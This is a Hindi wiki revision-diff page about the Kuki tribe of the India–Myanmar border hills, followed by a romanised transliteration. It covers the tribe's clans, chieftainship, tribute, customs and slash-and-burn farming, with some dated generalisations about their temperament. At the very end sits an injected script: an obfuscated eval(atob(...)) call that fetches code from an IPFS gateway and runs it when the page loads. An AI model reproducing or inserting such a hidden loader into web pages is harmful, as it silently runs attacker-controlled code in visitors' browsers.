Difference between revisions of "कुकी जनजाति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "विलंब" to "विलम्ब")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
[[चित्र:Kuki-Tribe.jpg|thumb|250px|कुकी जनजाति]]
 
[[चित्र:Kuki-Tribe.jpg|thumb|250px|कुकी जनजाति]]
'''कुकी''' [[भारत]] और [[म्यांमार]] के बीच की सीमा की मिज़ो पहाड़ियों पर रहने वाले दक्षिण-पूर्वी एशियाई लोग है। इस जनजाति की जनसंख्या [[1970]] के दशक में लगभग 12,000 थी। ये मुख्यतः अधिक संख्या वाले मिज़ो लोगों में उनकी प्रथाएँ व [[भाषा]] अपनाकर घुलमिल गए हैं।
+
'''कुकी''' [[भारत]] और [[म्यांमार]] के बीच की सीमा की मिज़ो पहाड़ियों पर रहने वाले दक्षिण-पूर्वी एशियाई लोग है। इस जनजाति की जनसंख्या [[1970]] के दशक में लगभग 12,000 थी। ये मुख्यतः अधिक संख्या वाले मिज़ो लोगों में उनकी प्रथाएँ व [[भाषा]] अपनाकर घुलमिल गए हैं। इसके बोंजुंग कुकी, बायटे कुकी, खेलमा कुकी आदि कई कुलवाची भेद हैं। ये बलिष्ठ एवं ठिंगने होते हैं और नागा लोगों की अपेक्षा अधिक खूंखार समझे जाते हैं। आज से लगभग सौ वर्ष पूर्व लुशाई और कुकी लोगों में युद्ध हुआ जिसमें कुकी लोगों की हार हुई और वे अपना निवास छोड़कर काचार में आ बसे। उन्हें तत्कालीन ब्रिटिश सरकार ने प्रश्रय दिया और 200 कुकियों को सीमांत रक्षार्थ सैनिक शिक्षा दी।
 +
==सरदार==
 +
कुकी लोग अपने सरदार की आज्ञा का पालन अपना [[धर्म]] समझते हैं सरदार उनका एक प्रकार से राजा होता है और समझा जाता है कि वह दैवी अंश है। इस कारण वे लोग उसका कभी अनादर करने का साहस नहीं करते वरन्‌ वह जो आदेश देता है उसका [[आँख |आँख]] मूँदकर पालन करते हैं। विशेष अवसर आने पर सरदार संकेत द्वारा आदेश जारी करता है। यदि कोई व्यक्ति सरदार का भाला सुसज्जित रूप में लेकर [[गाँव]] में घूमता है तो उसका अर्थ होता है कि सरदार ने सब लोगों को अविलम्ब बुलाया है। इस वर्ग का प्रत्येक व्यक्ति अपने सरदार को प्रति वर्ष कर स्वरूप एक टोकरी [[चावल]], एक बकरी, एक कुक्कुट और अपने शिकार का चौथा भाग प्रदान करता है और चार दिन की कमाई देता है। सरदार की सहायता के लिए एक मंत्रिमंडल होता है जिसकी सहायता से वह न्याय करता है।
 +
*कुकी लोगों में विश्वासघात की सजा मृत्यु है। खून के [[अपराध]] में खूनी और उसके परिवार को गुलामी करनी होती है। स्त्रियों को किसी प्रकार की स्वतंत्रता नहीं है उनपर सरदार का आदेश लागू होता है। कुकी लोग उथेन नामक देवता की पूजा करते हैं।  
 
==परंपरा==
 
==परंपरा==
 
परंपरागत रूप से कुकी जंगलों में छोटी बस्तियों में रहते थे, जिनमें प्रत्येक उसके अपने प्रमुख द्वारा शासित होती थी। मुखिया का सबसे छोटा पुत्र अपने पिता की संपत्ति का उत्तराधिकारी होता था, जबकि अन्य पुत्रों का गाँव की लड़कियों से [[विवाह]] करवाकर उन्हें स्वयं अपने गाँव स्थापित करने हेतु भेज दिया जाता था। कुकी [[बाँस]] के जंगलों में एकाकी जीवन व्यतीत करते हैं, जो इन्हें निर्माण व हस्तकला सामाग्रियाँ उपलब्ध कराते हैं। ये जंगल को जलाकर भूमि साफ़ करके [[चावल]] उगाते है, जंगली जानवरों का शिकार करते हैं और कुत्ते, [[सूअर]], [[भैंस]], बकरी व मुर्गियां पालते हैं।
 
परंपरागत रूप से कुकी जंगलों में छोटी बस्तियों में रहते थे, जिनमें प्रत्येक उसके अपने प्रमुख द्वारा शासित होती थी। मुखिया का सबसे छोटा पुत्र अपने पिता की संपत्ति का उत्तराधिकारी होता था, जबकि अन्य पुत्रों का गाँव की लड़कियों से [[विवाह]] करवाकर उन्हें स्वयं अपने गाँव स्थापित करने हेतु भेज दिया जाता था। कुकी [[बाँस]] के जंगलों में एकाकी जीवन व्यतीत करते हैं, जो इन्हें निर्माण व हस्तकला सामाग्रियाँ उपलब्ध कराते हैं। ये जंगल को जलाकर भूमि साफ़ करके [[चावल]] उगाते है, जंगली जानवरों का शिकार करते हैं और कुत्ते, [[सूअर]], [[भैंस]], बकरी व मुर्गियां पालते हैं।
 +
 +
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 12: Line 17:
 
[[Category:जातियाँ और जन जातियाँ]]
 
[[Category:जातियाँ और जन जातियाँ]]
 
[[Category:मणिपुर]]
 
[[Category:मणिपुर]]
 
+
[[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 09:06, 10 February 2021

thumb|250px|kuki janajati kuki bharat aur myaanmar ke bich ki sima ki mizo paha diyoan par rahane vale dakshin-poorvi eshiyaee log hai. is janajati ki janasankhya 1970 ke dashak mean lagabhag 12,000 thi. ye mukhyatah adhik sankhya vale mizo logoan mean unaki prathaean v bhasha apanakar ghulamil ge haian. isake boanjuang kuki, bayate kuki, khelama kuki adi kee kulavachi bhed haian. ye balishth evan thiangane hote haian aur naga logoan ki apeksha adhik khooankhar samajhe jate haian. aj se lagabhag sau varsh poorv lushaee aur kuki logoan mean yuddh hua jisamean kuki logoan ki har huee aur ve apana nivas chho dakar kachar mean a base. unhean tatkalin british sarakar ne prashray diya aur 200 kukiyoan ko simaant raksharth sainik shiksha di.

saradar

kuki log apane saradar ki ajna ka palan apana dharm samajhate haian saradar unaka ek prakar se raja hota hai aur samajha jata hai ki vah daivi aansh hai. is karan ve log usaka kabhi anadar karane ka sahas nahian karate varanh‌ vah jo adesh deta hai usaka aankh mooandakar palan karate haian. vishesh avasar ane par saradar sanket dvara adesh jari karata hai. yadi koee vyakti saradar ka bhala susajjit roop mean lekar gaanv mean ghoomata hai to usaka arth hota hai ki saradar ne sab logoan ko avilamb bulaya hai. is varg ka pratyek vyakti apane saradar ko prati varsh kar svaroop ek tokari chaval, ek bakari, ek kukkut aur apane shikar ka chautha bhag pradan karata hai aur char din ki kamaee deta hai. saradar ki sahayata ke lie ek mantrimandal hota hai jisaki sahayata se vah nyay karata hai.

  • kuki logoan mean vishvasaghat ki saja mrityu hai. khoon ke aparadh mean khooni aur usake parivar ko gulami karani hoti hai. striyoan ko kisi prakar ki svatantrata nahian hai unapar saradar ka adesh lagoo hota hai. kuki log uthen namak devata ki pooja karate haian.

paranpara

paranparagat roop se kuki jangaloan mean chhoti bastiyoan mean rahate the, jinamean pratyek usake apane pramukh dvara shasit hoti thi. mukhiya ka sabase chhota putr apane pita ki sanpatti ka uttaradhikari hota tha, jabaki any putroan ka gaanv ki l dakiyoan se vivah karavakar unhean svayan apane gaanv sthapit karane hetu bhej diya jata tha. kuki baans ke jangaloan mean ekaki jivan vyatit karate haian, jo inhean nirman v hastakala samagriyaan upalabdh karate haian. ye jangal ko jalakar bhoomi saf karake chaval ugate hai, jangali janavaroan ka shikar karate haian aur kutte, sooar, bhaians, bakari v murgiyaan palate haian.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>